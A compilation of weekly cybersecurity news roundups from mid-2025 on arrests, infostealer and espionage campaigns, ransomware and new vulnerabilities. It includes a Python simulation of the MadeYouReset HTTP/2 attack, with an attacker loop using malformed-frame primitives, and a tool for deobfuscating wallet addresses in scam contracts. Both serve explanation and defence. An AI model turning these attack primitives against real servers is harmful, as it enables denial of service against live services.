In a separate case, Al-Tahery Al-Mashriky of Rotherham, UK, has been sentenced to 20 months in prison after pleading guilty to nine cybercrime charges and admitting to the theft of millions of Facebook credentials and hacking websites across Yemen, Israel, Canada, and the U.S. Linked to extremist groups like Spider Team and Yemen Cyber Army, Al-Mashriky infiltrated government systems, defaced sites, and held stolen login data from services including PayPal and Netflix. Authorities said that many of his attacks sought to target websites posting religious content or political viewpoints.

While law enforcement pursues offenders, defenders are also strengthening ecosystems. The Python Package Index (PyPI) now checks for expired domains to block supply chain attacks via domain resurrection. This update targets scenarios where attackers register an expired domain to hijack accounts through password resets, a tactic first exploited in 2022 with the ctx PyPI package. Since early June, PyPI has marked over 1,800 email addresses tied to expiring domains as unverified. Domains are now reviewed every 30 days using Fastly’s Status API. PyPI also urges users to enable 2FA and maintain backup emails from trusted providers to boost cyber hygiene.

The Bad | Noodlophile InfoStealer Attackers Evolve Malware With Telegram Staging

A series of attacks leveraging spearphishing and Noodlophile malware continues to target enterprises in the U.S., Europe, the Baltics, and the Asia-Pacific regions. A new report details how the threat actors behind the campaign are using upgraded delivery mechanisms in order to deploy an enhanced version of Noodlophile Stealer.

In particular, the campaign relies on spearphishing emails with copyright infringement lures, including details such as Facebook Page IDs and company ownership records gleaned during reconnaissance. The tailored messages provide Dropbox links that deliver ZIP or MSI installers designed to sideload a malicious DLL via legitimate Haihaisoft PDF Reader binaries. This launches the obfuscated Noodlophile infostealer after batch scripts establish persistence through the Windows Registry.

Example spearphishing email (Source: Morphisec)

Noodlophile first gained attention in May 2025 for disguising itself as fake AI-powered tools promoted on Facebook. While similar copyright-themed lures are not a new technique, the latest variant introduces distinct abuse of software vulnerabilities, Telegram-based staging, and dynamic payload execution. As a key element in the attack, Telegram group descriptions are used as a dead drop resolver to fetch the actual payload server (paste[.]rs), complicating detection and takedown efforts.

The stealer harvests browser data and system information, and its evolving codebase hints at future enhancements such as screenshot capture, keylogging, process monitoring, file encryption, and network data theft. Security researchers highlight that the campaign focuses on enterprises with large social media presences, particularly those with a significant number of Facebook followers.

By layering obfuscation, LOLBin abuse, and in-memory execution, Noodlophile’s ongoing development and adaptation signal that its operators are refining the malware into a more versatile and dangerous enterprise threat.

The Ugly | DPRK-Based Actors Deploy MoonPeak RAT via GitHub to Spy on South Korea

A new cyberespionage campaign targeting South Korean diplomatic missions has been attributed to North Korean threat actors, with activity spanning from March to July 2025. At least 19 spearphishing emails have impersonated trusted diplomats and officials, luring foreign ministry staff and embassy personnel with fake meeting invites, letters, and event announcements.

Security researchers found the attackers using GitHub as a covert command and control (C2) channel, while also abusing Dropbox, Google Drive, and Daum Cloud to distribute a customized version of the open-source Xeno RAT, dubbed MoonPeak. Malicious ZIP files delivered through phishing contained disguised Windows shortcut (LNK) files that launch PowerShell scripts before ultimately fetching payloads from GitHub and establishing persistence via scheduled tasks. Decoy documents are then shown to victims while the malware harvests system data and exfiltrates it to private GitHub repositories.

Campaign infection chain (Source: Trellix)

The campaign is linked to Kimsuky, a DPRK-aligned threat group known for espionage against South Korean targets. The lures, written in multiple languages including Korean, English, Arabic, and French, were all carefully timed with real diplomatic events to boost their credibility.

However, forensic analysis has raised attribution questions: attacker activity appeared to align more closely with Chinese time zones, including a notable three-day pause coinciding with China’s national holidays in April 2025. This suggests multiple possibilities. Either North Korean operatives are working from Chinese territory, Chinese actors are mimicking Kimsuky tradecraft, or there is a joint collaboration blending Chinese resources and North Korea’s ability to gather intelligence.

Currently, researchers assess with medium confidence that the attackers operate from within China, potentially leveraging Korean infrastructure to blend into local network traffic while conducting intelligence-gathering operations on behalf of Pyongyang.

The Good, the Bad and the Ugly in Cybersecurity – Week 33

The Good | DoJ Charges $100M Fraud Ring & Seizes $1M in Crypto from BlackSuit Ransomware

The DoJ has charged four Ghanaian nationals, Isaac Oduro Boateng (aka “Kofi Boat”), Inusah Ahmed (aka “Pascal”), Derrick Van Yeboah (aka “Van”), and Patrick Kwame Asare (aka “Borgar”), for their roles in a $100 million fraud scheme involving romance scams and business email compromise (BEC) attacks. All four defendants allegedly belonged to a major crime ring operating globally from 2016 to 2023 and focused on targeting U.S. companies and vulnerable individuals, particularly senior citizens who live alone.

Combining fake romance scams, spoofed emails, and forged wire transfer authorization letters, they tricked victims into wiring funds to U.S.-based contacts, who then laundered the proceeds for West African ‘chairmen’ – members of the fraud ring stationed in West Africa. Boateng and Ahmed were identified as ringleaders, while Yeboah focused on romance scams. The charges carry potential sentences of up to 20 years for each major offense.

The DoJ has also seized $1,091,453 in cryptocurrency from the BlackSuit ransomware group, tracing the funds as criminals moved them across multiple exchanges to hide their origins. The seized amount was part of a 49.3 Bitcoin ransom (worth $1.45M at the time) paid on April 4, 2023, for a decryptor. The action followed the June 2024 collection of key evidence and came soon after “Operation Checkmate”, which took down BlackSuit’s dark web extortion portals.

This week, the DOJ announced coordinated actions against the BlackSuit (Royal) ransomware group, including the takedown of servers and domains and the seizure of virtual currency. The disruption was coordinated by the FBI, @DHSgov, @SecretService, @IRS_CI and international law… pic.twitter.com/DHtSeGzlRo

— FBI (@FBI) August 14, 2025

BlackSuit, linked to Royal, Quantum, and Chaos ransomware, has been tied to over 450 attacks across U.S. critical sectors and has amassed $370M in ransom payments combined. Authorities emphasize that seizing illicit funds remains a critical component to disrupting ransomware operations, in particular hindering how actors can use their funds to maintain or rebuild infrastructure and recruit new affiliates and members.

The Bad | Cyberespionage Group Targets Georgia and Moldova with Stealthy MucorAgent Backdoor

Seemingly aligned with Russian geopolitical interests, ‘Curly COMrades’ are targeting government and judicial bodies in Georgia as well as energy firms in Moldova. The new cyberespionage group first emerged mid-last year and is known to use a custom three-stage .NET backdoor dubbed ‘MucorAgent’, which is capable of executing AES-encrypted PowerShell scripts and uploading results to a command and control (C2) server. The name derives from heavy use of curl.exe for exfiltration and COM object hijacking.

Curly COMrades achieves persistence through an uncommon method: it hijacks class identifiers (CLSIDs) tied to the Windows Native Image Generator (NGEN) component via a seemingly inactive scheduled task. The task runs unpredictably during idle times or system changes. Additional tools include the Go-based Resocks proxy, custom SOCKS5 servers, SSH with Stunnel, and CurlCat for obfuscated traffic relayed through compromised sites.

Resocks as a relay point into a compromised network where Network A represents an attacker and Network B represents a victim (Source: Bitdefender)

The group has also been observed installing legitimate remote access tools like Remote Utilities (RuRat) and commercial RMM software for interactive control. MucorAgent bypasses Windows’ Antimalware Scan Interface (AMSI), retrieves encrypted payloads disguised as PNG files, and harvests credentials by attempting NTDS database extractions and LSASS dumps. Curly COMrades implements dynamic command scheduling within MucorAgent, using in-memory decryption for secondary payloads and leveraging obfuscated .NET reflection to execute injected code, minimizing footprint and evading static analysis detection. Network reconnaissance relied on living-off-the-land binaries (netstat, wmic, ipconfig) and PowerShell AD enumeration.

While Curly COMrades employs stealthy techniques, open-source tools, and legitimate utilities to blend with normal activity, their operations generate detectable signals picked up by XDR platforms. Currently, cyber researchers suggest the attacks are part of a larger espionage campaign focused on persistence, credential theft, and data exfiltration.

The Ugly | New “MadeYouReset” Attack Technique Exploits HTTP/2 Flaw to Bypass DoS Protections

Cyber researchers have disclosed ‘MadeYouReset’, a new HTTP/2 attack technique (CVE-2025-8671) capable of bypassing the standard 100 concurrent request limit per TCP connection. This enables attackers to send thousands of requests and trigger powerful denial-of-service (DoS) conditions for legitimate users and vendors. In some implementations, the flaw can escalate to out-of-memory crashes. Affected products include Apache Tomcat (CVE-2025-48989), F5 BIG-IP (CVE-2025-54500), and Netty (CVE-2025-55163).

MadeYouReset is the latest flaw to affect HTTP/2 and builds on the earlier Rapid Reset attack (CVE-2023-44487) and its mitigations. Rapid Reset had the client cancel streams with RST_STREAM frames; MadeYouReset abuses the same stream-reset mechanism (used for both client cancellations and error signaling) without the client ever sending an RST_STREAM frame. Attackers send valid requests, then follow them with carefully timed protocol violations that force the server itself to reset the stream while the backend is still processing the request. Because Rapid Reset mitigations count client-initiated resets, this server-initiated variant bypasses them while achieving similar disruption.

RapidReset attack (Source: Imperva)

Six crafted primitives can induce a server-side reset, including WINDOW_UPDATE frames with an invalid increment, PRIORITY frames that make a stream depend on itself, frames with illegal lengths, and HEADERS or DATA frames sent after the stream has been closed. The technique exploits a mismatch between what the HTTP/2 specification considers a closed stream and the work the server’s backend is still doing for it, leading to resource exhaustion.
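The accounting mismatch is easiest to see in code. The following Python model is an added example for this article, not the researchers’ proof of concept or any server’s real implementation: it simulates only the per-connection bookkeeping (which streams are open at the protocol level, which requests the backend is still processing) and models two of the primitives above, a WINDOW_UPDATE with a zero increment (a stream error of type PROTOCOL_ERROR under RFC 7540 §6.9) and a PRIORITY frame that makes a stream depend on itself (§5.3.1). Frames are constructed tuples rather than wire format, and the reset cap of 10 is an arbitrary illustrative value.

```python
from dataclasses import dataclass, field
from typing import Optional, Set, Tuple

MAX_CONCURRENT_STREAMS = 100  # the SETTINGS_MAX_CONCURRENT_STREAMS value most servers advertise


@dataclass
class ConnectionState:
    """Per-connection bookkeeping of a simulated HTTP/2 server.

    count_inflight=False -> naive: the concurrency limit only counts streams that are
                            open at the protocol level (pre-MadeYouReset behaviour).
    count_inflight=True  -> hardened: streams whose backend work is still running count
                            against the limit even after the server has reset them.
    max_server_resets    -> hardened: close the connection after this many
                            server-initiated RST_STREAMs (None = no cap).
    """
    count_inflight: bool
    max_server_resets: Optional[int] = None
    open_streams: Set[int] = field(default_factory=set)  # open at the protocol level
    inflight: Set[int] = field(default_factory=set)      # backend still processing
    server_resets: int = 0
    client_resets: int = 0                                # what Rapid Reset mitigations count
    refused: int = 0
    closed: bool = False

    def _active(self) -> int:
        if self.count_inflight:
            return len(self.open_streams | self.inflight)
        return len(self.open_streams)

    def _server_reset(self, sid: int) -> str:
        # Server emits RST_STREAM: the stream is closed for the protocol, but nothing
        # tells the backend to stop, so `inflight` keeps its entry.
        self.open_streams.discard(sid)
        self.server_resets += 1
        if self.max_server_resets is not None and self.server_resets > self.max_server_resets:
            self.closed = True  # GOAWAY: treat a flood of server-side resets like client resets
        return "RST_STREAM"

    def handle(self, frame: Tuple) -> str:
        """frame is a constructed tuple (kind, stream_id, *args), not wire format."""
        if self.closed:
            return "dropped"
        kind, sid, *args = frame
        if kind == "HEADERS":                        # new request
            if self._active() >= MAX_CONCURRENT_STREAMS:
                self.refused += 1
                return "REFUSED_STREAM"
            self.open_streams.add(sid)
            self.inflight.add(sid)                   # dispatched to the backend immediately
            return "accepted"
        if kind == "RST_STREAM":                     # client cancellation (Rapid Reset)
            self.client_resets += 1
            self.open_streams.discard(sid)
            return "ok"
        if kind == "WINDOW_UPDATE" and sid in self.open_streams and args[0] == 0:
            return self._server_reset(sid)           # RFC 7540 §6.9: zero increment is PROTOCOL_ERROR
        if kind == "PRIORITY" and sid in self.open_streams and args[0] == sid:
            return self._server_reset(sid)           # RFC 7540 §5.3.1: a stream cannot depend on itself
        if kind == "BACKEND_DONE":                   # backend finished, resources released
            self.inflight.discard(sid)
            return "ok"
        return "ok"


def made_you_reset(conn: ConnectionState, requests: int = 1000) -> int:
    """Attacker loop: open a stream, then poison it so the *server* resets it.
    No client RST_STREAM is ever sent. Returns how many requests reached the backend."""
    accepted = 0
    for i in range(requests):
        sid = 2 * i + 1                              # client-initiated streams are odd-numbered
        if conn.handle(("HEADERS", sid)) == "accepted":
            accepted += 1
        # alternate the two primitives modelled here
        poison = ("WINDOW_UPDATE", sid, 0) if i % 2 == 0 else ("PRIORITY", sid, sid)
        conn.handle(poison)
    return accepted


def compare(requests: int = 1000) -> dict:
    naive = ConnectionState(count_inflight=False)
    inflight_only = ConnectionState(count_inflight=True)
    capped = ConnectionState(count_inflight=True, max_server_resets=10)
    return {
        "naive_backend_load": made_you_reset(naive, requests),
        "naive_client_resets_seen": naive.client_resets,
        "inflight_accounting": made_you_reset(inflight_only, requests),
        "inflight_plus_reset_cap": made_you_reset(capped, requests),
    }


if __name__ == "__main__":
    print(compare())
```

The naive server lets all 1,000 requests reach the backend while its client-reset counter (the only thing a Rapid Reset mitigation watches) stays at zero; counting in-flight backend work holds the connection to 100 and capping server-initiated resets ends it after a handful.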

According to the CERT Coordination Center (CERT/CC), the vulnerability stems from server-triggered Rapid Reset behavior that allows attackers to overwhelm server resources and deny service to legitimate users. Researchers also warn that MadeYouReset highlights the growing complexity of protocol abuse and the need for defenses against subtle exploits that stay largely within the letter of the specification.

Given HTTP/2’s critical role in web infrastructure, researchers stress that patching affected products and refining protocol-level defenses are essential to prevent large-scale exploitation of this emerging threat.

The Good, the Bad and the Ugly in Cybersecurity – Week 32

The Good | U.S. Indicts Tax Fraud Phisher & Cryptomixer Founders for Laundering Millions

Nigerian national Chukwuemeka Victor Amachukwu was extradited this week from France to the U.S. to face multiple charges, including identity theft, wire fraud, and hacking. Between 2019 and 2021, Amachukwu and his co-conspirators launched spear phishing attacks on U.S. tax preparation businesses, stealing personal data that was used to file fraudulent IRS tax returns and SBA loan applications.

The schemes netted over $3.3 million: $2.5 million in stolen tax refunds and $819,000 from fake SBA loans. Separately, Amachukwu ran a bogus investment scheme involving fictitious standby letters of credit, misleading victims into investing millions that he pocketed. He currently faces six charges, with a potential sentence of up to 20 years per wire fraud count plus a mandatory two years for identity theft, and the U.S. is seeking forfeiture of all illicit gains.

Samourai Wallet founders Keonne Rodriguez and William Lonergan Hill have both pleaded guilty to laundering over $200 million in criminal proceeds through their cryptocurrency mixing service. From 2015 to 2024, their tools, Whirlpool and Ricochet, enabled anonymous Bitcoin transactions, processing over 80,000 BTC linked to breaches, spear phishing schemes, dark web markets, and DeFi-related fraud. Rodriguez and Hill promoted Samourai as a means to conceal illicit funds, even advising hackers to use it.

Source: DoJ

They were arrested in April 2024 and charged with operating an unlicensed money-transmitting business and money laundering, facing up to 25 years in prison. Both have agreed to forfeit over $237 million, and Samourai’s domains and servers have been seized and its app removed from the Google Play Store. The mixing services reportedly generated more than $6 million in fees by intentionally helping criminals obscure their financial tracks.

The Bad | Fake Trading Bots on YouTube Drain $900K in Crypto via Malicious Smart Contracts

A new report from SentinelLABS uncovers a widespread cryptocurrency scam campaign using malicious smart contracts disguised as trading bots to steal funds. Distributed through aged and seemingly credible YouTube accounts, these scams have already drained over $900,000 USD from victims since early 2024.

The contracts are written in Solidity and compiled and deployed through the Remix IDE. They hide attacker-controlled wallet addresses through obfuscation techniques like XOR encoding, string concatenation, and large-number conversion, so that a casual reader of the source never sees a recognizable address. Victims are tricked into funding these contracts; once funded, embedded logic redirects the ETH to the hidden attacker-controlled wallet.
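An analyst looking at one of these contracts wants the address that will actually receive the funds, not the obfuscated arithmetic around it. The Python below is an added example for this article, not SentinelLABS’ tooling: it builds a constant table from the source, evaluates every integer expression inside an address(...) cast with a whitelist evaluator, and joins the string fragments passed to string.concat or abi.encodePacked. The sample contract is constructed to mimic the three techniques named above (XOR of two constants, a 160-bit decimal literal, and concatenated string pieces); the addresses in it are made up, and the specific source patterns matched are assumptions about how such contracts are written.

```python
import ast
import re
from typing import Dict, List

ADDRESS_SPACE = 1 << 160

# Solidity casts are transparent for our purposes: address(uint160(x)) -> ((x))
CAST_RE = re.compile(r"\b(?:u?int\d*|address|bytes\d*|payable)\s*\(")
# `<type> [modifiers] name = <expr>;`  e.g. `uint256 private constant k1 = 0x5a..;`
CONST_RE = re.compile(r"\b(?:u?int\d*|bytes\d*|address)\b[^=;]*?\b(\w+)\s*=\s*([^=;]+);")
# string.concat("0x..", "..") / abi.encodePacked("0x..", "..") piecing an address together
STRCALL_RE = re.compile(r"(?:string\.concat|abi\.encodePacked)\s*\(([^)]*)\)")
STR_RE = re.compile(r'"([^"]*)"')
ADDR_CAST_RE = re.compile(r"\baddress\s*\(")
HEX40_RE = re.compile(r"^0x[0-9a-fA-F]{40}$")

OPS = {
    ast.BitXor: lambda a, b: a ^ b, ast.BitOr: lambda a, b: a | b, ast.BitAnd: lambda a, b: a & b,
    ast.Add: lambda a, b: a + b, ast.Sub: lambda a, b: a - b, ast.Mult: lambda a, b: a * b,
    ast.LShift: lambda a, b: a << b, ast.RShift: lambda a, b: a >> b,
}


def _eval(node: ast.AST, env: Dict[str, int]) -> int:
    """Whitelist evaluator: integer literals, known constants and bitwise/arithmetic ops only."""
    if isinstance(node, ast.Expression):
        return _eval(node.body, env)
    if isinstance(node, ast.Constant) and type(node.value) is int:
        return node.value
    if isinstance(node, ast.Name):
        return env[node.id]                      # KeyError -> caller skips the expression
    if isinstance(node, ast.BinOp) and type(node.op) in OPS:
        return OPS[type(node.op)](_eval(node.left, env), _eval(node.right, env))
    raise ValueError("unsupported construct")


def eval_solidity_int(expr: str, env: Dict[str, int]) -> int:
    py_expr = CAST_RE.sub("(", expr)             # drop the casts, keep the parentheses
    return _eval(ast.parse(py_expr, mode="eval"), env)


def _balanced(text: str, start: int) -> str:
    """Return the contents of the parenthesised group whose '(' is at `start`."""
    depth = 0
    for i in range(start, len(text)):
        if text[i] == "(":
            depth += 1
        elif text[i] == ")":
            depth -= 1
            if depth == 0:
                return text[start + 1:i]
    raise ValueError("unbalanced parentheses")


def to_address(value: int) -> str:
    return "0x" + format(value, "040x")


def recover_addresses(source: str) -> List[Dict[str, str]]:
    """Resolve obfuscated wallet addresses in a Solidity source string."""
    env: Dict[str, int] = {}
    found: List[Dict[str, str]] = []
    # 1) build the constant table (XOR keys, split halves, big decimals ...)
    for name, rhs in CONST_RE.findall(source):
        try:
            env[name] = eval_solidity_int(rhs, env)
        except (ValueError, KeyError, SyntaxError):
            continue
    # 2) every address(...) cast: evaluate whatever is inside it
    for m in ADDR_CAST_RE.finditer(source):
        try:
            v = eval_solidity_int(_balanced(source, m.end() - 1), env)
        except (ValueError, KeyError, SyntaxError):
            continue
        if 0 < v < ADDRESS_SPACE:
            found.append({"address": to_address(v), "how": "address() cast of integer expression"})
    # 3) string concatenation of address fragments
    for call in STRCALL_RE.findall(source):
        joined = "".join(STR_RE.findall(call))
        if HEX40_RE.match(joined):
            found.append({"address": joined.lower(), "how": "concatenated string fragments"})
    return found


# --- constructed sample mimicking the obfuscation styles named in the report (fake addresses) ---
SAMPLE_CONTRACT = """
pragma solidity ^0.8.0;
contract MevBot {
    uint256 private constant k1 = 0x5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a;
    uint256 private constant k2 = 0x486e0c22caf197b5486e0c22caf197b5486e0c22;
    function router() internal pure returns (address) { return address(uint160(k1 ^ k2)); }
    function pool() internal pure returns (address) {
        return address(uint160(730750818665451459101842416358141509827966271488));
    }
    function dex() internal pure returns (string memory) {
        return string.concat("0xAbCdEf01", "23456789Ab", "CdEf012345", "6789AbCdEf01");
    }
    function start() external payable { payable(router()).transfer(msg.value); }
}
"""

if __name__ == "__main__":
    for hit in recover_addresses(SAMPLE_CONTRACT):
        print(hit)
```

Anything the evaluator cannot reduce (msg.sender, storage reads, function calls) is skipped rather than guessed, so the output is a list of concrete addresses to look up on a block explorer before deploying anything.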

The scam videos often feature AI-generated narrators, which make it easier and cheaper to produce scams at scale, along with heavily managed comment sections that fake legitimacy. Accounts like @Jazz_Braze and @SolidityTutorials have posted highly viewed tutorials with no obvious signs of malicious intent, while some scams were spread through unlisted videos shared via Telegram.

Scams in this campaign have seen varied success. While some generate a few thousand dollars, one video titled “How to Create Passive Income MEV Bot” funneled over $900,000 USD to a single attacker address. The account behind that video had been populated with entertainment shorts over many months, likely to build up its ranking. The video remains unlisted and is likely shared via other social platforms.

Jazz_Braze’s MEV Bot tutorial video

Given the ease of generating AI content and purchasing aged YouTube accounts, the crypto scam ecosystem is increasingly accessible to attackers. SentinelLABS urges crypto users to avoid deploying code promoted by influencer content and to thoroughly validate any tools before use. If a trading bot promises easy profit without transparency, it’s likely a scam – especially in the volatile world of crypto.

The Ugly | Attackers Exploit Possible SonicWall Zero-Day to Deploy Akira Ransomware in Firewalls

SonicWall is investigating a potential zero-day vulnerability after a surge in Akira ransomware attacks targeting its Gen 7 firewalls with SSLVPN enabled. Multiple incidents have been reported both internally and externally, prompting SonicWall to publish guidance: disable SSLVPN where possible, limit SSLVPN access to trusted IPs, enforce MFA, update passwords, and remove inactive accounts. While disabling VPN access may not be feasible for all users, the network security company recommends initiating incident response measures immediately.

Security researchers observed attackers exploiting SonicWall firewalls to access networks, pivoting quickly to domain controllers, disabling Microsoft Defender, and deploying Akira ransomware. The attacks, which began in late July, have involved tools like AnyDesk, ScreenConnect, and SSH. All confirmed incidents are linked to Akira; in some, the attackers gained unauthorized access but failed to encrypt systems.

The suspected vulnerability appears to affect firmware versions 7.2.0-7015 and earlier, particularly on TZ- and NSa-series devices. Other researchers posit that a zero-day is likely in play, as attacks have succeeded even with MFA enabled.

The latest updates on the attacks further reveal that Akira affiliates use a Bring Your Own Vulnerable Driver (BYOVD) technique, loading drivers such as rwdrv.sys and hlpdrv.sys to gain kernel-level access and tamper with Windows Defender settings, effectively disabling antivirus protection. Additionally, Akira threat actors use SEO poisoning to lure IT professionals to trojanized installers that deploy Bumblebee malware, enabling remote access, credential theft, and eventual ransomware deployment.

Since emerging in March 2023, Akira has compromised over 250 victims and extorted an estimated $42 million through targeted ransomware campaigns.

The Good, the Bad and the Ugly in Cybersecurity – Week 31

The Good | FBI Seizes Chaos Ransomware Bitcoin as CISA Launches Thorium for Scalable Malware Analysis

Over 20 Bitcoins, worth more than $1.7 million, are now in the possession of the FBI following the seizure of a cryptocurrency wallet belonging to a Chaos ransomware affiliate known as “Hors”. The funds have been traced to ransomware payments, and the U.S. Department of Justice has filed a civil forfeiture complaint to permanently claim the assets.

Today, FBI Dallas made public the seizure of over $1.7 million worth of cryptocurrency as part of ongoing efforts to combat ransomware. The seized funds were traced to a cryptocurrency address allegedly associated with a member of the Chaos ransomware group, known as “Hors,” who… pic.twitter.com/uWeIMMGE9J

— FBI Dallas (@FBIDallas) July 28, 2025

Chaos ransomware is considered a rebrand of the BlackSuit group as well as a partial-successor to the defunct Conti gang, but unrelated to any older, low-tier Chaos variants. Security researchers have tied the new Chaos operation to BlackSuit based on its tools, encryption, and ransom notes. The FBI’s Bitcoin seizure follows law enforcement’s takedown of BlackSuit’s dark web infrastructure, which likely exposed the wallet connected to Hors.

From CISA this week, an open-source platform named “Thorium” was publicly released to help government, private sector, and research teams automate malware and forensic investigations. Thorium was developed in conjunction with Sandia National Laboratories and can process over 10 million files per hour while handling 1,700 tasks per second per permission group, streamlining complex incident response and malware analysis workflows.

Thorium works by integrating commercial, open-source, and custom tools as Docker images, supports secure group-based permissions, and scales with Kubernetes and ScyllaDB to meet workload demands. Security teams can use it to tag and search results, share tools, and automate large-scale binary and digital artifact analysis.

The platform is available on CISA’s GitHub, joining recent public tools like the Eviction Strategies Tool and Malware Next-Gen, all furthering CISA’s mission to strengthen collective cyber defense capabilities.

The Bad | SentinelLABS Uncovers Patents Exposing Hafnium’s Expansive MSS-Linked Capabilities

SentinelLABS has identified more than ten patents for advanced forensics and data collection tools tied to the Chinese state-linked threat actor, Hafnium, highlighting the complexity of China’s cyber contracting ecosystem. Hafnium’s capabilities, many of which were previously unreported, include acquisition of encrypted endpoint data, mobile forensics, router and network traffic collection, and specialized software for decrypting hard drives.

The findings build on the DoJ’s indictment of two hackers: Xu Zewei and Zhang Yu, as well as the U.S. Treasury’s sanction of Yin Kecheng and Zhou Shuai. Xu and Zhang allegedly worked under the Shanghai State Security Bureau (SSSB) via Shanghai Powerock and Shanghai Firetech, while Yin and Zhou operated through Shanghai Heiying and the broker firm i-Soon. This tiered contractor model shows how the Ministry of State Security (MSS) leverages private firms for offensive cyber operations, sometimes spanning multiple regions beyond Shanghai.

An organization chart for people and businesses known to be associated with Hafnium

Hafnium (aka Silk Typhoon) first rose to prominence in 2021 for exploiting Microsoft Exchange Server (MES) zero-days, which led to opportunistic attacks by other Chinese groups and the first ever joint statement from the U.S., U.K., and E.U. Subsequent research and leaked i-Soon chats revealed a layered ecosystem with low-tier contractors like i-Soon, mid-tier firms like Chengdu 404, and elite outfits like Firetech that are trusted with direct MSS tasks.

The 10+ patents filed by Shanghai Firetech suggest the company possesses far broader capabilities than publicly attributed to Hafnium. These tools may support human intelligence (HUMINT)-style close access operations and could have been provided to other MSS regional offices, complicating attribution. The findings, as a whole, show that threat actor labels track activity clusters, while true attribution requires tracing operations back to the people and companies executing them.

The Ugly | Secret Blizzard Exploits ISP-Level Access & SORM to Spy on Moscow Diplomatic Missions

Secret Blizzard (aka Turla or Waterbug) is conducting cyber-espionage operations against diplomatic missions in Moscow. Researchers note that the Russian Federal Security Service (FSB)-linked group is exploiting an adversary-in-the-middle (AiTM) position at the internet service provider (ISP) level in order to leverage Russia’s SORM surveillance system to intercept traffic and deploy custom ApolloShadow malware.

Secret Blizzard AiTM infection chain (Source: Microsoft)

Attackers have been observed redirecting victims to captive portals that prompt them to download a malware-laced antivirus installer. Once executed, ApolloShadow installs a forged trusted root certificate masquerading as Kaspersky anti-virus. With that certificate in place, Secret Blizzard can spoof legitimate sites, decrypt TLS traffic, and maintain persistent access to diplomatic and governmental networks for long-term monitoring. Researchers note this is the first observed instance of Secret Blizzard conducting ISP-level espionage, with a special focus on foreign embassies, diplomatic entities, and sensitive organizations in Moscow that rely on local providers.

Although discovered in February 2025, the campaign has been active since at least 2024 and represents a high-risk threat to embassies and sensitive organizations in Moscow. By combining network-level interception, certificate forgery, and custom malware delivery, Secret Blizzard achieves long-term surveillance and intelligence collection without relying on traditional spear phishing or direct network intrusion.

Secret Blizzard, linked to Russia’s FSB Center 16, is one of the longest-operating advanced persistent threats (APTs), active since the 1990s, and responsible for global campaigns targeting embassies, defense organizations, and research institutions. This latest campaign demonstrates the group’s adaptability and sophistication, using local ISP-level access and Russia’s domestic surveillance ecosystem to maintain covert, long-term access for intelligence gathering against high-profile diplomatic targets.

The Good, the Bad and the Ugly in Cybersecurity – Week 30

The Good | Authorities Dismantle XSS.is Cybercrime Forum & Release Free Phobos/8Base Decryptor

After a 12-year long run, XSS[.]is (formerly DaMaGeLaB) faced major disruptions this week with the arrest of its suspected administrator as part of a joint operation led by French and Ukrainian authorities. The Russian-speaking cybercrime forum had been active since 2013 with nearly 50,000 users and acted as a popular hub for stolen data, hacking tools, and ransomware services. Authorities also seized its clearnet domain.

Source: TheHackerNews

The suspected administrator, also linked to the private messaging site thesecure[.]biz, is believed to have earned over €7 million from advertising and facilitating criminal transactions. Europol reports that the admin had been active in the cybercrime scene for nearly 20 years, maintaining ties to prominent cybercriminal groups over the decades. XSS[.]is also featured an escrow system and encrypted communications, reinforcing its reputation, alongside forums like Exploit, as a key platform for cyberattacks against targets outside Russia.

Japanese police have released a free decryptor for Phobos and 8Base ransomware victims, allowing those affected to recover their encrypted files. Phobos, active since 2018, operated as a ransomware-as-a-service (RaaS) platform while 8Base launched in 2023 using modified encryptors with double extortion tactics. A major international crackdown on Phobos last year led to the arrest of key members and the seizure of 27 servers, enabling creation of the decryptor.

The decryptor is available on the Japanese police’s website, with instructions in English, and on Europol’s NoMoreRansom portal. It supports extensions like .phobos, .8base, .elbie, .faust, and .LIZARD, but law enforcement says it may also work with others. Users are encouraged to test it, as it may decrypt additional variants.

The Bad | Lumma MaaS Rebuilds Operations After Takedown, Evading Detection with New Tactics

After major law enforcement action taken back in May, Lumma infostealer operations are steadily regaining momentum despite disruptions to its infrastructure. Although the takedown significantly impacted the malware-as-a-service (MaaS) platform, Lumma never fully shut down. Its operators quickly addressed the disruption on cybercrime forums, asserting that their central server had not been seized (though it was remotely wiped) and that restoration was already underway.

To date, security researchers note that Lumma is nearly back to pre-takedown levels, with telemetry data confirming a rapid rebuilding of its infrastructure. Latest updates to this second wind include a shift from Cloudflare to Russian-based provider Selectel, presumably to evade future takedowns. However, the MaaS continues to use legitimate cloud infrastructure to disguise malicious activity.

Lumma has resumed operations through four main channels. First, fake software cracks and key generators are promoted via malvertising, leading users to deceptive sites that fingerprint visitors with a traffic distribution system (TDS) before serving the payload. Second, ClickFix: compromised websites display fake CAPTCHA pages that trick visitors into pasting and executing PowerShell commands, which load Lumma directly into memory to avoid file-based detection.

Third, Lumma operators set up GitHub repositories filled with AI-generated content advertising fake game cheats, with the Lumma payload hidden in executables or ZIP archives. Finally, YouTube videos and Facebook posts advertise cracked software, linking to external download sites, some of them hosted on trusted platforms like sites.google.com to lend credibility.

Source: Trend Micro

Lumma’s re-emergence reflects how infrastructure seizures alone are insufficient. Without arrests or indictments, the cyber war machine keeps turning, and threat actors will continue to treat such takedowns as temporary disruptions to an otherwise profitable enterprise.

The Ugly | CISA Orders Urgent SharePoint Patching As Microsoft Confirms ToolShell Exploits

Last weekend, Microsoft confirmed active exploitation of a zero-day vulnerability in on-premises SharePoint Servers, dubbed “ToolShell” (CVE-2025-53770), along with a bypass variant tracked as CVE-2025-53771. Together with the earlier patched bugs CVE-2025-49704 and CVE-2025-49706, these flaws form an unauthenticated RCE chain that targets the /ToolPane.aspx URI with a crafted POST request. Emergency patches have been released for SharePoint Subscription Edition and SharePoint Server 2019, with updates for SharePoint Server 2016 pending.

While the initial wave of attacks was targeted, broader exploitation is expected as PoC code circulates. SentinelOne’s report on the attacks noted actors setting up honeypots and sharing tooling, signaling growing threat actor interest. CISA has since added the CVEs to its KEV catalog, citing confirmed exploitation, and ordered federal agencies to remediate affected systems immediately. Microsoft has linked the ToolShell attacks to suspected China-based threat actors, including Linen Typhoon and Violet Typhoon, who began targeting on-premises SharePoint servers as early as July 7.

Update: See newly added info to our #ToolShell Alert. We’ve included info on ransomware deployment, new webshells involved in exploitation, & detection guidance 👉 https://t.co/Y37FHSeAL0 pic.twitter.com/C5aMXNOmAU

— CISA Cyber (@CISACyber) July 24, 2025

